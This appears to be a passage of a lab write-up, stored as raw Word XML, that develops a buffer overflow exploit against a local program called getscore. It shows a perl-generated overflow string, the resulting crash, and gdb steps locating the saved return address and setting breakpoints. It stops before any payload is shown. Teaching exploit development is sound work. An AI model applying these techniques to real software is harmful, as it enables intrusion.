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62E" w:rsidRDefault="00CB74C4" w:rsidP="005903D7">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">The first step in developing this exploit is to run the target program – “getscore.c” – using standard parameters. The program takes two arguments within the command line: a name and a social security number. Upon further examination of the source code, we find that a buffer overflow exploit may be deployed since there are no checks in place to prevent arguments that exceed the capacity of </w:t>
      </w:r>
      <w:r w:rsidR="005903D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>string buffers.</w:t>
      </w:r>
      <w:r w:rsidR="008F7985">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> In particular, within “getscore.c” – the get_score function takes in the two command line arguments and attempts to write them to a character buffer.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005903D7" w:rsidRDefault="005903D7" w:rsidP="005903D7">
      <w:pPr>
        <w:spacing w:before="240" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>To test this finding, we can create a simple perl command to quickly produce a large string of characters with which to pass to the program. The back tick character “`” substitutes the output of the perl command on the command line, passing a string of 150 A’s to getscore.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005903D7" w:rsidRDefault="005903D7" w:rsidP="005903D7">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="180"/>
          <w:tab w:val="left" w:pos="270"/>
        </w:tabs>
        <w:spacing w:before="240" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>[root@localhost Exploit]# ./getscore “aaa” `perl -e ‘print “</w:t>
      </w:r>
      <w:r w:rsidR="002A4C42">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>”x150;’`</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005903D7" w:rsidRDefault="005903D7" w:rsidP="005903D7">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>Segmentation fault</w:t>
      </w:r>
      <w:r w:rsidR="002A4C42">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> (core dumped)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005903D7" w:rsidRDefault="005903D7" w:rsidP="005903D7">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005903D7" w:rsidRDefault="005903D7" w:rsidP="005903D7">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Success – a segmentation fault indicates this error hasn’t been caught within the program, providing an entry point for an exploit. To examine further what is going on during execution, we may take advantage of the GNU Debugger</w:t>
      </w:r>
      <w:r w:rsidR="002A4C42">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A4C42" w:rsidRDefault="002A4C42" w:rsidP="002A4C42">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="240" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>[root@localhost Exploit]# gdb getscore</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A4C42" w:rsidRPr="002A4C42" w:rsidRDefault="002A4C42" w:rsidP="002A4C42">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="240" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A4C42">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">We’ll begin by setting the same arguments before, though slightly differently so </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>that the debugger</w:t>
      </w:r>
      <w:r w:rsidRPr="002A4C42">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> can understand</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> (note the additional quotation marks around the perl command)</w:t>
      </w:r>
      <w:r w:rsidRPr="002A4C42">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A4C42" w:rsidRDefault="002A4C42" w:rsidP="002A4C42">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="240" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
        <w:t>(gdb) set args “aaa” “`perl -e ‘print “A”x150;’`”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A4C42" w:rsidRDefault="002A4C42" w:rsidP="002A4C42">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="240" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Before running, we’ll first set a breakpoint before the main function is executed. Otherwise, the program will execute as it did outside the debugger, allowing us no time to examine the stack as instructions are executed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A4C42" w:rsidRDefault="002A4C42" w:rsidP="002A4C42">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="240" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>(gdb) break main</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A4C42" w:rsidRDefault="002A4C42" w:rsidP="002A4C42">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
        <w:t>Breakpoint 1 at 0x8048625</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A4C42" w:rsidRDefault="002A4C42" w:rsidP="002A4C42">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="240" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>We can now run the program, which will stop at the beginning of main.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A4C42" w:rsidRDefault="002A4C42" w:rsidP="002A4C42">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="240" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>(gdb) run</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A4C42" w:rsidRPr="002A4C42" w:rsidRDefault="002A4C42" w:rsidP="002A4C42">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="002A4C42">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>Starting program: /root/Exploit/getscore "aa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>a" "`perl -e 'print "A"x150;'`"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A4C42" w:rsidRDefault="002A4C42" w:rsidP="002A4C42">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="002A4C42">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>Breakpoint 1, 0x08048625 in main ()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6814" w:rsidRPr="009D6814" w:rsidRDefault="002A4C42" w:rsidP="009D6814">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="240" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Let’s take a look at the current stack fr</w:t>
      </w:r>
      <w:r w:rsidR="009D6814">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>ame to see how the stack looks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6814" w:rsidRPr="009D6814" w:rsidRDefault="009D6814" w:rsidP="009D6814">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="240" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009D6814">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>(gdb) info frame</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6814" w:rsidRPr="009D6814" w:rsidRDefault="009D6814" w:rsidP="009D6814">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009D6814">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>Stack level 0, frame at 0xbffff518:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6814" w:rsidRPr="009D6814" w:rsidRDefault="009D6814" w:rsidP="009D6814">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D6814">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009D6814">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">eip = 0x8048625 in main; </w:t>
      </w:r>
      <w:r w:rsidRPr="00A8555F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:t>saved eip 0x42015574</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6814" w:rsidRPr="009D6814" w:rsidRDefault="009D6814" w:rsidP="009D6814">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009D6814">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>called by frame at 0xbffff538</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6814" w:rsidRPr="009D6814" w:rsidRDefault="009D6814" w:rsidP="009D6814">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009D6814">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> Arglist at 0xbffff518, args:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6814" w:rsidRPr="009D6814" w:rsidRDefault="009D6814" w:rsidP="009D6814">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009D6814">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> Locals at 0xbffff518, Previous frame's sp in esp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6814" w:rsidRPr="009D6814" w:rsidRDefault="009D6814" w:rsidP="009D6814">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009D6814">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> Saved registers:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6814" w:rsidRDefault="009D6814" w:rsidP="009D6814">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009D6814">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">  ebp at 0xbffff518, </w:t>
      </w:r>
      <w:r w:rsidRPr="00A8555F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>eip at 0xbffff51c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6814" w:rsidRDefault="009D6814" w:rsidP="009D6814">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="240" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">From this command, we can see that the current saved instruction pointer or return address (also known as the eip) is </w:t>
      </w:r>
      <w:r w:rsidRPr="00A8555F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:t>0x42015574</w:t>
      </w:r>
      <w:r w:rsidR="008F7985">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">, stored at </w:t>
      </w:r>
      <w:r w:rsidR="008F7985" w:rsidRPr="00A8555F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>0xbffff51c</w:t>
      </w:r>
      <w:r w:rsidR="008F7985">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>. Now that we have those values, we can set a second break point after the buffer has been overflowed, specifically just before the get_score function returns. To find this, we can disassemble that function and determine the location of the second-to-last instruction: leave.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A8555F" w:rsidRDefault="008F7985" w:rsidP="009D6814">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="240" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A8555F" w:rsidRDefault="00A8555F" w:rsidP="009D6814">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="240" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008F7985" w:rsidRDefault="00A8555F" w:rsidP="009D6814">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="240" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="008F7985">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>(gdb) disas get_score</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Dump of assembler code for function get_score:</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0x08048788 &lt;get_score+0&gt;:       push   %ebp</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0x08048789 &lt;get_score+1&gt;:       mov    %esp,%ebp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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0x0804878b &lt;get_score+3&gt;:       sub    $0x118,%esp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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t>.</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t>.</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0x0804886f &lt;get_score+231&gt;:     movl   $0xffffffff,0xfffffef0(%ebp)</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0x08048879 &lt;get_score+241&gt;:     mov    0xfffffef0(%ebp),%eax</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0x0804887f &lt;get_score+247&gt;:     leave</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0x08048880 &lt;get_score+248&gt;:     ret</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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End of assembler dump.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F7985" w:rsidRDefault="008F7985" w:rsidP="008F7985">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="240" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">So, we can now set a second breakpoint at </w:t>
      </w:r>
      <w:r w:rsidRPr="008F7985">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>0x0804887f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> in order to view the buffer after it has been filled with our arguments, but before it returns to the main function.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F7985" w:rsidRPr="008F7985" w:rsidRDefault="008F7985" w:rsidP="008F7985">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="240" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008F7985">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>(gdb) break *0x0804887f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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Breakpoint 2 at 0x804887f</w:t>
      </w:r>
    </w:p>
